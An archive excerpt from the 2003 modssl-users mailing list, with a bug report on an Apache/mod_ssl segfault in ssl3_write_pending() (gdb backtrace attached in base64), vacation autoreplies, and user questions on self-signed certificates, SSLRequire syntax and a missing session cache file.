Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7985BA8944; Fri, 11 Jul 2003 18:18:24 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mailbox.rabbit-run.net (mailbox.rabbit-run.net [216.174.13.244])
	by master.modssl.org (Postfix) with ESMTP id 6D790A8934
	for ; Fri, 11 Jul 2003 18:18:22 +0200 (CEST)
Received: from USUL.purefm.net ([])
        by mailbox.rabbit-run.net (Ultimate Mail Server v1.0) with SMTP id GMB73904
        for ; Fri, 11 Jul 2003 12:18:15 -0400
Message-Id: <5.2.1.1.0.20030711121642.03a96e78@mailbox.purefm.net>
X-Sender: fischerdk@mailbox.purefm.net
X-Mailer: QUALCOMM Windows Eudora Version 5.2.1
Date: Fri, 11 Jul 2003 12:18:07 -0400
To: modssl-users@modssl.org
From: "Douglas K. Fischer" 
Subject: Fwd: Tracking down mod_ssl/OpenSSL bug
Mime-Version: 1.0
Content-Type: multipart/mixed;
	boundary="=====================_357959608==_"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Douglas K. Fischer" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--=====================_357959608==_
Content-Type: text/plain; charset="us-ascii"; format=flowed


----- Begin forwarded message -----
Ralf,

I have been doing some code-walking to track down a problem we've been 
having since last November with Apache child processes getting segmentation 
faults periodically, and it appears to boil down to something with mod_ssl 
and/or OpenSSL. I was hoping you could help shed some light on this, and/or 
suggest where to next extend my search. Here are the details thus far:

- Running Apache 1.3.27 and mod_ssl 2.8.14 with OpenSSL 0.9.7b (also tried 
with the 0.9.6 line with the same results)

gdb backtrace (attached) shows the segmentation fault being generated by 
ssl3_write_pending(). This happens when a timeout occurs during 
ap_send_fd() or ap_send_mmap(). The Apache timeout() handler is invoked by 
the SIGALRM handler, which closes the connection and frees the SSL context. 
When the signal handler finishes and returns to the stack (where we were in 
the middle of a write operation somewhere inside of ssl3_write_pending()), 
ssl3_write_pending() segfaults when it tries to access the non-existent 
context.

I'm not sure if this would be considered a deficiency in how mod_ssl closes 
the connection, in how OpenSSL's ssl3_write_pending() checks for a valid 
context after BIO_write(), or something else entirely.

Any direction you can provide would be greatly appreciated. I'd be more 
than happy to provide any additional info or debugging/troubleshooting steps.

Many thanks,

Doug 
------------------------------------------------------------

This email, and any included attachments, have been checked
by Norton AntiVirus Corporate Edition (Version 8.0), AVG
Server Edition 6.0, and Merak Email Server Integrated
Antivirus (Alwil Software's aVast! engine) and is certified
Virus Free.
--=====================_357959608==_
Content-Type: text/plain; name="apache_sigsegv_gdb_bt.txt";
 x-mac-type="42494E41"; x-mac-creator="74747874"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="apache_sigsegv_gdb_bt.txt"

W3Jvb3RAdGVzdDAxIH5dIyBnZGIgLXggL3RtcC9nZGIuY21kIGh0dHBkCkdOVSBnZGIgUmVkIEhh
dCBMaW51eCAoNS4yLTIpCkNvcHlyaWdodCAyMDAyIEZyZWUgU29mdHdhcmUgRm91bmRhdGlvbiwg
SW5jLgpHREIgaXMgZnJlZSBzb2Z0d2FyZSwgY292ZXJlZCBieSB0aGUgR05VIEdlbmVyYWwgUHVi
bGljIExpY2Vuc2UsIGFuZCB5b3UgYXJlCndlbGNvbWUgdG8gY2hhbmdlIGl0IGFuZC9vciBkaXN0
cmlidXRlIGNvcGllcyBvZiBpdCB1bmRlciBjZXJ0YWluIGNvbmRpdGlvbnMuClR5cGUgInNob3cg
Y29weWluZyIgdG8gc2VlIHRoZSBjb25kaXRpb25zLgpUaGVyZSBpcyBhYnNvbHV0ZWx5IG5vIHdh
cnJhbnR5IGZvciBHREIuICBUeXBlICJzaG93IHdhcnJhbnR5IiBmb3IgZGV0YWlscy4KVGhpcyBH
REIgd2FzIGNvbmZpZ3VyZWQgYXMgImkzODYtcmVkaGF0LWxpbnV4Ii4uLgpCcmVha3BvaW50IDEg
YXQgMHg4MGJkNzY0OiBmaWxlIGh0dHBfbWFpbi5jLCBsaW5lIDE0OTkuCltOZXcgVGhyZWFkIDEw
MjQgKExXUCAxMDkwNildClByb2Nlc3NpbmcgY29uZmlnIGRpcmVjdG9yeTogL2V0Yy9odHRwZC9j
b25mL2h0dHBkLmNvbmYKIFByb2Nlc3NpbmcgY29uZmlnIGZpbGU6IC9ldGMvaHR0cGQvY29uZi9o
dHRwZC5jb25mL2FwYWNoZS5jb25mCgpbU3dpdGNoaW5nIHRvIFRocmVhZCAxMDI0IChMV1AgMTA5
MDYpXQoKQnJlYWtwb2ludCAxLCB0aW1lb3V0IChzaWc9MTQpIGF0IGh0dHBfbWFpbi5jOjE0OTkK
MTQ5OSAgICAgICAgaWYgKGFsYXJtc19ibG9ja2VkKSB7CihnZGIpIGJ0CiMwICB0aW1lb3V0IChz
aWc9MTQpIGF0IGh0dHBfbWFpbi5jOjE0OTkKIzEgIDB4MDgwYmEwZmIgaW4gYWxybV9oYW5kbGVy
IChzaWc9MTQpIGF0IGh0dHBfbWFpbi5jOjE2MjgKIzIgIDB4NDAwMjc1ZWIgaW4gcHRocmVhZF9z
aWdoYW5kbGVyIChzaWdubz0xNCwgY3R4PQogICAgICB7Z3MgPSAwLCBfX2dzaCA9IDAsIGZzID0g
MCwgX19mc2ggPSAwLCBlcyA9IDQzLCBfX2VzaCA9IDAsIGRzID0gNDMsIF9fZHNoID0gMCwgZWRp
ID0gMTM3MzI4NzI4LCBlc2kgPSA4MjIxLCBlYnAgPSAzMjIxMjA2NDQwLCBlc3AgPSAzMjIxMjA2
MzkyLCBlYnggPSA3LCBlZHggPSA4MjIxLCBlY3ggPSAxMzczMjg3MjgsIGVheCA9IDcxNDYsIHRy
YXBubyA9IDEsIGVyciA9IDAsIGVpcCA9IDEwNzUzNDEyMzYsIGNzID0gMzUsIF9fY3NoID0gMCwg
ZWZsYWdzID0gNjQyLCBlc3BfYXRfc2lnbmFsID0gMzIyMTIwNjM5Miwgc3MgPSA0MywgX19zc2gg
PSAwLCBmcHN0YXRlID0gMHhiZmZmYjJmOCwgb2xkbWFzayA9IDIxNDc0ODM2NDgsIGNyMiA9IDB9
KSBhdCBzaWduYWxzLmM6OTcKIzMgIDxzaWduYWwgaGFuZGxlciBjYWxsZWQ+CiM0ICAweDQwMTg2
N2I0IGluIF9fbGliY193cml0ZSAoKSBhdCBfX2xpYmNfd3JpdGU6LTEKIzUgIDB4NDAwMzJlZmMg
aW4gX19EVE9SX0VORF9fICgpIGZyb20gL2xpYi9saWJwdGhyZWFkLnNvLjAKIzYgIDB4MDgxMGFm
ZjkgaW4gc29ja193cml0ZSAoYj0weDgyZTk5OTAsIAogICAgaW49MHg4MmY3ODU4ICJcMDI3XDAw
M1wwMDEgXDAzMGK5V3v9+L5cMDE2P+jBXDAxNrNcMjE3ZClcMDI3/ehQXGIg8clcMDAysFxl0a2q
uFwyMzdcMDAzXDIwNUc+XGIg0FwyMzFcMDMxd7NcMDI3yFdccshcMDA21EytIXVMKyRcMTc3RUv1
XdNML7vW5sn7XDAyMqhcMjE3XlwyMzXd/UlcMjMyXDAwMs63XDAzNV3Z9FwyMTLqXDAxN1wwMDRC
rEzHXDIwMFx0PTjjLSnJXDIzMrt7XDAyNd/3XDAyM1pOXdq2+lwyMjdUXDAzNFwyMTBoXDAzN2tc
MjM3Or7IXDIzNOBcMTc3XDIzN+1cMjIwOdxcMjIwxVwyMTDOQt5cMTc3YmdcMjM0+L5GoeiqK1wy
MDHpXDIwMzrdZj5cMjAx5sN0TuRcMjMzUaAurrKtWkBcMDM3JMDA+uK/yERcMjAyXDAwNvopQdq1
TsvtXDIyNSyuIi4uLiwgaW5sPTgyMjEpCiAgICBhdCBic3Nfc29jay5jOjE1NwojNyAgMHgwODEw
OTMyNiBpbiBCSU9fd3JpdGUgKGI9MHg4MmU5OTkwLCBpbj0weDgyZjc4NTgsIGlubD04MjIxKQog
ICAgYXQgYmlvX2xpYi5jOjIwMQojOCAgMHgwODBmZDg1NSBpbiBzc2wzX3dyaXRlX3BlbmRpbmcg
KHM9MHg4MmU3NTMwLCB0eXBlPTIzLCAKICAgIGJ1Zj0weGJmZmZiOGIwICItRGF0ZWkg5HF1aXZh
bGVudCBpc3Q7IHp1c+R0emxpY2hlIFRyZWliZXIgXG5r9m5udGVuIHdlaXRlcmhpbiBlcmZvcmRl
cmxpY2ggc2Vpbi5cblxuIiwgJz0nIDxyZXBlYXRzIDc2IHRpbWVzPiwgIlxuSElMRkUgQU5GT1JO
REVSTlxuXG5adWdyaWZmIPxiZXIgZGFzIFdlYiBodCIuLi4sIGxlbj04MTkyKSBhdCBzM19wa3Qu
Yzo3NDAKIzkgIDB4MDgwZmQ3NjkgaW4gZG9fc3NsM193cml0ZSAocz0weDgyZTc1MzAsIHR5cGU9
MjMsIAogICAgYnVmPTB4YmZmZmI4YjAgIi1EYXRlaSDkcXVpdmFsZW50IGlzdDsgenVz5HR6bGlj
aGUgVHJlaWJlciBcbmv2bm50ZW4gd2VpdGVyaGluIGVyZm9yZGVybGljaCBzZWluLlxuXG4iLCAn
PScgPHJlcGVhdHMgNzYgdGltZXM+LCAiXG5ISUxGRSBBTkZPUk5ERVJOXG5cblp1Z3JpZmYg/GJl
ciBkYXMgV2ViIGh0Ii4uLiwgbGVuPTgxOTIsIGNyZWF0ZV9lbXB0eV9mcmFnbWVudD0wKSBhdCBz
M19wa3QuYzo3MTMKIzEwIDB4MDgwZmQzNjIgaW4gc3NsM193cml0ZV9ieXRlcyAocz0weDgyZTc1
MzAsIHR5cGU9MjMsIGJ1Zl89MHhiZmZmYjhiMCwgCiAgICBsZW49ODE5MikgYXQgczNfcGt0LmM6
NTQyCiMxMSAweDA4MGZiMTg2IGluIHNzbDNfd3JpdGUgKHM9MHg4MmU3NTMwLCBidWY9MHhiZmZm
YjhiMCwgbGVuPTgxOTIpCiAgICBhdCBzM19saWIuYzoxNzE4CiMxMiAweDA4MGU0ZTBkIGluIFNT
TF93cml0ZSAocz0weDgyZTc1MzAsIGJ1Zj0weGJmZmZiOGIwLCBudW09ODE5MikKICAgIGF0IHNz
bF9saWIuYzo4NzMKIzEzIDB4MDgwODUxODEgaW4gc3NsX2lvX2hvb2tfd3JpdGUgKGZiPTB4ODI0
ZjhjMCwgCiAgICBidWY9MHhiZmZmYjhiMCAiLURhdGVpIORxdWl2YWxlbnQgaXN0OyB6dXPkdHps
aWNoZSBUcmVpYmVyIFxua/ZubnRlbiB3ZWl0ZXJoaW4gZXJmb3JkZXJsaWNoIHNlaW4uXG5cbiIs
ICc9JyA8cmVwZWF0cyA3NiB0aW1lcz4sICJcbkhJTEZFIEFORk9STkRFUk5cblxuWnVncmlmZiD8
YmVyIGRhcyBXZWIgaHQiLi4uLCBsZW49ODE5MikgYXQgc3NsX2VuZ2luZV9pby5jOjM4NAojMTQg
MHgwODBkMzUyMSBpbiBhcF9ob29rX2NhbGxfZnVuYyAoYXA9MHhiZmZmYjc3NCwgaGU9MHg4MjM0
YTM4LCBoZj0weDgyMzdjNDApCiAgICBhdCBhcF9ob29rLmM6NjQ5CiMxNSAweDA4MGQzMTJjIGlu
IGFwX2hvb2tfY2FsbCAoaG9vaz0weDgxZWMxZDUgImFwOjpidWZmOjp3cml0ZSIpCiAgICBhdCBh
cF9ob29rLmM6MzgyCiMxNiAweDA4MGIzNWQwIGluIGFwX3dyaXRlIChmYj0weDgyNGY4YzAsIGJ1
Zj0weGJmZmZiOGIwLCBuYnl0ZT04MTkyKQogICAgYXQgYnVmZi5jOjM2MQojMTcgMHgwODBiNDI2
OSBpbiB3cml0ZV93aXRoX2Vycm9ycyAoZmI9MHg4MjRmOGMwLCBidWY9MHhiZmZmYjhiMCwgbmJ5
dGU9ODE5MikKICAgIGF0IGJ1ZmYuYzo0MDgKIzE4IDB4MDgwYjQzMTMgaW4gYmN3cml0ZSAoZmI9
MHg4MjRmOGMwLCBidWY9MHhiZmZmYjhiMCwgbmJ5dGU9ODE5MikKIzE5IDB4MDgwYjQ2ODcgaW4g
YXBfYndyaXRlIChmYj0weDgyNGY4YzAsIGJ1Zj0weGJmZmZiOGIwLCBuYnl0ZT04MTkyKQogICAg
YXQgYnVmZi5jOjE0MjcKIzIwIDB4MDgwYzUxM2IgaW4gYXBfc2VuZF9mZF9sZW5ndGggKGY9MHg4
MmZlNzk4LCByPTB4ODJmYzFhMCwgbGVuZ3RoPS0xKQogICAgYXQgaHR0cF9wcm90b2NvbC5jOjI0
MDMKIzIxIDB4MDgwYzUwMTEgaW4gYXBfc2VuZF9mZCAoZj0weDgyZmU3OTgsIHI9MHg4MmZjMWEw
KSBhdCBodHRwX3Byb3RvY29sLmM6MjM3MwojMjIgMHgwODBiYmUxNCBpbiBkZWZhdWx0X2hhbmRs
ZXIgKHI9MHg4MmZjMWEwKSBhdCBodHRwX2NvcmUuYzozOTMwCiMyMyAweDA4MGI1MzVkIGluIGFw
X2ludm9rZV9oYW5kbGVyIChyPTB4ODJmYzFhMCkgYXQgaHR0cF9jb25maWcuYzo1MzAKIzI0IDB4
MDgwYzgxZGMgaW4gcHJvY2Vzc19yZXF1ZXN0X2ludGVybmFsIChyPTB4ODJmYzFhMCkgYXQgaHR0
cF9yZXF1ZXN0LmM6MTMwOAojMjUgMHgwODBjODI1MyBpbiBhcF9wcm9jZXNzX3JlcXVlc3QgKHI9
MHg4MmZjMWEwKSBhdCBodHRwX3JlcXVlc3QuYzoxMzI0CiMyNiAweDA4MGMwM2E3IGluIGNoaWxk
X21haW4gKGNoaWxkX251bV9hcmc9MCkgYXQgaHR0cF9tYWluLmM6NDY4OQojMjcgMHgwODBjMDU0
YSBpbiBtYWtlX2NoaWxkIChzPTB4ODIyYmZjOCwgc2xvdD0wLCBub3c9MTA1NzY3ODY3OSkKICAg
IGF0IGh0dHBfbWFpbi5jOjQ4MTMKIzI4IDB4MDgwYzA2OGQgaW4gc3RhcnR1cF9jaGlsZHJlbiAo
bnVtYmVyX3RvX3N0YXJ0PTEpIGF0IGh0dHBfbWFpbi5jOjQ4OTUKIzI5IDB4MDgwYzBjZTAgaW4g
c3RhbmRhbG9uZV9tYWluIChhcmdjPTE4LCBhcmd2PTB4YmZmZmRiZjQpCiAgICBhdCBodHRwX21h
aW4uYzo1MjAzCiMzMCAweDA4MGMxNWUzIGluIG1haW4gKGFyZ2M9MTgsIGFyZ3Y9MHhiZmZmZGJm
NCkgYXQgaHR0cF9tYWluLmM6NTU2NgojMzEgMHg0MDBjOTMzNiBpbiBfX2xpYmNfc3RhcnRfbWFp
biAobWFpbj0weDgwYzExNTAgPG1haW4+LCBhcmdjPTE4LCAKICAgIHVicF9hdj0weGJmZmZkYmY0
LCBpbml0PTB4ODA3YzcxNCA8X2luaXQ+LCBmaW5pPTB4ODFjNzA2MCA8X2Zpbmk+LCAKICAgIHJ0
bGRfZmluaT0weDQwMDBkMmZjIDxfZGxfZmluaT4sIHN0YWNrX2VuZD0weGJmZmZkYmVjKQogICAg
YXQgLi4vc3lzZGVwcy9nZW5lcmljL2xpYmMtc3RhcnQuYzoxMjkKKGdkYikgYwpDb250aW51aW5n
LgoKUHJvZ3JhbSByZWNlaXZlZCBzaWduYWwgU0lHU0VHViwgU2VnbWVudGF0aW9uIGZhdWx0Lgow
eDA4MGZkODkxIGluIHNzbDNfd3JpdGVfcGVuZGluZyAocz0weDgyZTc1MzAsIHR5cGU9MjMsIAog
ICAgYnVmPTB4YmZmZmI4YjAgIi1EYXRlaSDkcXVpdmFsZW50IGlzdDsgenVz5HR6bGljaGUgVHJl
aWJlciBcbmv2bm50ZW4gd2VpdGVyaGluIGVyZm9yZGVybGljaCBzZWluLlxuXG4iLCAnPScgPHJl
cGVhdHMgNzYgdGltZXM+LCAiXG5ISUxGRSBBTkZPUk5ERVJOXG5cblp1Z3JpZmYg/GJlciBkYXMg
V2ViIGh0Ii4uLiwgbGVuPTgxOTIpIGF0IHMzX3BrdC5jOjc0OQo3NDkgICAgICAgICAgICAgICAg
ICAgICBpZiAoaSA9PSBzLT5zMy0+d2J1Zi5sZWZ0KQooZ2RiKSBxdWl0ClRoZSBwcm9ncmFtIGlz
IHJ1bm5pbmcuICBFeGl0IGFueXdheT8gKHkgb3IgbikgeQpbcm9vdEB0ZXN0MDEgfl0jIAo=
--=====================_357959608==_--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 11 18:20:16 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D5EEFA8982; Fri, 11 Jul 2003 18:20:16 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mhub.AXP.MDX.AC.UK (mhub.axp.mdx.ac.uk [158.94.6.11])
	by master.modssl.org (Postfix) with ESMTP id BEE88A8944
	for ; Fri, 11 Jul 2003 18:20:15 +0200 (CEST)
Received: from CONVERSION-DAEMON.mdx.ac.uk by mdx.ac.uk (PMDF V6.2 #30533)
 id <01KY52A3O300007N1H@mdx.ac.uk> for modssl-users@modssl.org; Fri,
 11 Jul 2003 17:20:07 +0100 (BST)
Received: from mdx-cpq-temp1.nw.mdx.ac.uk (dyn052-012.mdx.ac.uk [158.94.52.12])
 by mdx.ac.uk (PMDF V6.2 #30533) with ESMTP id <01KY52A3BF5I007LNJ@mdx.ac.uk>
 for modssl-users@modssl.org; Fri, 11 Jul 2003 17:20:06 +0100 (BST)
Received: from MDX-CPQ-TEMP1/SpoolDir by mdx-cpq-temp1.nw.mdx.ac.uk
 (Mercury 1.48); Fri, 11 Jul 2003 17:17:54 +0000
Received: from SpoolDir by MDX-CPQ-TEMP1 (Mercury 1.48); Fri,
 11 Jul 2003 17:17:44 +0000
Date: Fri, 11 Jul 2003 17:17:13 +0000
From: a.moon@mdx.ac.uk
Subject: Fwd: Tracking down mod_ssl/OpenSSL bug
To: modssl-users@modssl.org
Message-id: <10EE60A5E9F@mdx-cpq-temp1.nw.mdx.ac.uk>
Content-transfer-encoding: 7BIT
X-Autoreply-From: 
X-Comment: Middlesex University has scanned this message for viruses.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: a.moon@mdx.ac.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am away on annual leave until the 15th July 2003

I will get back to you as soon as i can on my return.

If it's an urgent Online Learning Support Unit / Web/ MUBSWEB/ MUBS Online matter
that requires urgent attention then  please contact either  Kirsteen1, Sanjay1 or Jeff1
who should be able to help.

All the best 
Alex
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Jul 13 01:52:00 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id F04B1A8948; Sun, 13 Jul 2003 01:51:59 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from typhoon.enabled.com (typhoon.enabled.com [216.218.220.21])
	by master.modssl.org (Postfix) with ESMTP id 40E46A8934
	for ; Sun, 13 Jul 2003 01:50:36 +0200 (CEST)
Received: from enabled.com (localhost.enabled.com [127.0.0.1])
	by typhoon.enabled.com (8.12.9/8.12.9) with ESMTP id h6CNoXaU002485
	for ; Sat, 12 Jul 2003 16:50:33 -0700 (PDT)
	(envelope-from admin2@enabled.com)
From: "admin" 
To: modssl-users@modssl.org
Subject: certificate signing
Date: Sat, 12 Jul 2003 15:50:33 -0800
Message-Id: <20030712234829.M87671@enabled.com>
X-Mailer: Open WebMail 2.01 20030425
X-OriginatingIP: 131.161.240.131 (admin2)
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "admin" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users



so many docs so little time.  I am so lost with all the documentation out
there.  can somebody please send me a great site that shows how to generate
the following:

a server.crt
and a server.key
I will be my own CA

- Noah

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Jul 13 01:52:46 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 080FEA8967; Sun, 13 Jul 2003 01:52:45 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from typhoon.enabled.com (typhoon.enabled.com [216.218.220.21])
	by master.modssl.org (Postfix) with ESMTP id DC657A8934
	for ; Sun, 13 Jul 2003 01:52:44 +0200 (CEST)
Received: from enabled.com (localhost.enabled.com [127.0.0.1])
	by typhoon.enabled.com (8.12.9/8.12.9) with ESMTP id h6CNqhaU002510
	for ; Sat, 12 Jul 2003 16:52:43 -0700 (PDT)
	(envelope-from admin2@enabled.com)
From: "admin" 
To: modssl-users@modssl.org
Subject: certificate signing
Date: Sat, 12 Jul 2003 15:52:43 -0800
Message-Id: <20030712235243.M88486@enabled.com>
X-Mailer: Open WebMail 2.01 20030425
X-OriginatingIP: 131.161.240.131 (admin2)
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "admin" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


OS: FreeBSD 4.8
apache 1.3.27
modssl 2.8.14

so many docs so little time.  I am so lost with all the documentation out
there.  can somebody please send me a great site that shows how to generate
the following:

a server.crt
and a server.key
I will be my own CA

- Noah
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Jul 13 01:54:42 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id EC3DCA893C; Sun, 13 Jul 2003 01:54:41 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mhub.AXP.MDX.AC.UK (mhub.axp.mdx.ac.uk [158.94.6.11])
	by master.modssl.org (Postfix) with ESMTP id E482DA8934
	for ; Sun, 13 Jul 2003 01:53:46 +0200 (CEST)
Received: from CONVERSION-DAEMON.mdx.ac.uk by mdx.ac.uk (PMDF V6.2 #30533)
 id <01KY6WEV84SW00422E@mdx.ac.uk> for modssl-users@modssl.org; Sun,
 13 Jul 2003 00:53:44 +0100 (BST)
Received: from mdx-cpq-temp1.nw.mdx.ac.uk (dyn052-012.mdx.ac.uk [158.94.52.12])
 by mdx.ac.uk (PMDF V6.2 #30533) with ESMTP id <01KY6WEUYSKQ007FDJ@mdx.ac.uk>
 for modssl-users@modssl.org; Sun, 13 Jul 2003 00:53:44 +0100 (BST)
Received: from MDX-CPQ-TEMP1/SpoolDir by mdx-cpq-temp1.nw.mdx.ac.uk
 (Mercury 1.48); Sun, 13 Jul 2003 00:51:29 +0000
Received: from SpoolDir by MDX-CPQ-TEMP1 (Mercury 1.48); Sun,
 13 Jul 2003 00:51:05 +0000
Date: Sun, 13 Jul 2003 00:51:05 +0000
From: a.moon@mdx.ac.uk
Subject: certificate signing
To: modssl-users@modssl.org
Message-id: <12E75DE42DB@mdx-cpq-temp1.nw.mdx.ac.uk>
Content-transfer-encoding: 7BIT
X-Autoreply-From: 
X-Comment: Middlesex University has scanned this message for viruses.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: a.moon@mdx.ac.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am away on annual leave until the 15th July 2003

I will get back to you as soon as i can on my return.

If it's an urgent Online Learning Support Unit / Web/ MUBSWEB/ MUBS Online matter
that requires urgent attention then  please contact either  Kirsteen1, Sanjay1 or Jeff1
who should be able to help.

All the best 
Alex
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 14 12:17:45 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E7453A8948; Mon, 14 Jul 2003 12:17:44 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.gmx.net (mail.gmx.net [213.165.64.20])
	by master.modssl.org (Postfix) with SMTP id 909A1A8933
	for ; Mon, 14 Jul 2003 12:17:43 +0200 (CEST)
Received: (qmail 13895 invoked by uid 65534); 14 Jul 2003 10:17:42 -0000
Received: from unknown (HELO notebook) (193.41.148.40)
  by mail.gmx.net (mp010) with SMTP; 14 Jul 2003 12:17:42 +0200
Message-ID: <00ef01c349f1$5ea714e0$854da8c0@notebook>
From: "mario eugster" 
To: 
Subject: Problems with SSLRequire
Date: Mon, 14 Jul 2003 12:19:11 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1158
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "mario eugster" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi

I have some troubles to configure my SSLRequire directive. There are no
problems if I use only one row of requirements, but if I use more and
connect they with and/or, Apache announce a syntax error. Here is my script:


    SSLRequire (%{SSL_CLIENT_S_DN_CN} eq "zzz yyy" \
                  and %{SSL_CLIENT_S_DN_OU} eq "xxxx" \
                  and %{SSL_CLIENT_S_DN_O} eq "eeeee ggg")

                 or  ( %{SSL_CLIENT_S_DN_CN} eq "zzz yyy" \
                  and %{SSL_CLIENT_S_DN_OU} eq "pppp"
                  and %{SSL_CLIENT_S_DN_O} eq "qqqqq" )


Thanks for your help
eudgster


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 18 14:43:25 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 5A13CA8945; Fri, 18 Jul 2003 14:43:25 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from fep01-svc.flexmail.it (fep01.tuttopmi.it [212.131.248.100])
	by master.modssl.org (Postfix) with ESMTP id E2C00A8933
	for ; Fri, 18 Jul 2003 14:43:19 +0200 (CEST)
Received: from rtcinbf06 ([80.207.179.101]) by fep01-svc.flexmail.it
          (InterMail vM.5.01.05.09 201-253-122-126-109-20020611) with SMTP
          id <20030718124310.OQRG1564.fep01-svc.flexmail.it@rtcinbf06>
          for ; Fri, 18 Jul 2003 14:43:10 +0200
Message-ID: <017401c34d2a$1d986e40$f2fd1fac@realtech.int>
From: "Andrea Iacopini" 
To: 
Subject: ModSSL Problem: SSLCache DBM file not present
Date: Fri, 18 Jul 2003 14:42:57 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook Express 6.00.2800.1158
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Andrea Iacopini" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi guys,
after a reboot of my httpd service, normally scheduled via crontab, I
experienced a problem.
I have two systems with Redhat 6.2, Apache 1.3.14, mod-ssl 2.7.1,
Openssl 0.9.6: first of all I have to say that this configuration is
driven
by a third part commercial software ( SAP ITS, wgate) installed on this
systems.
After my reboot I had a lot of entries in my ssl_engine.log like these:
***BOF***
[14/Jul/2003 06:45:16 03384] [error] Cannot open SSLSessionCache DBM
file `/opt/httpd/logs/ssl_scache' for reading (fetch) (System error
follows)
[14/Jul/2003 06:45:16 03384] [error] System: File o directory
inesistente * (errno: 2)
***EOF***
Excuse me for pasting log with italian entries; the * non existence file
or directory.
After another reboot aka re-reading my httpd.conf I can see in my log
directory the files created by mod_ssl
MY question would be: why I had this problems ? what kind of problem I
experienced ?
I didn't changed my file/directory permissions.
Any ideas ?
Regards,

A.
========================================================================
Andrea Iacopini,
Technology Solutions, Networking and Security Competence Center

REALTECH Italia S.p.A. - Technology drives e-Business
Via Paolo di Dono, 73 - 00142 Roma, Italy

andrea.iacopini@realtech.it
Mobile + 39 335 123.44.93
Tel. +39 06 51.95.981, Fax. +39 06 51.96.36.74
========================================================================
Valued IEEE Member,
Member NO: 41412812
Real hackers don't die, just their TTL expires. [Unknown]


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
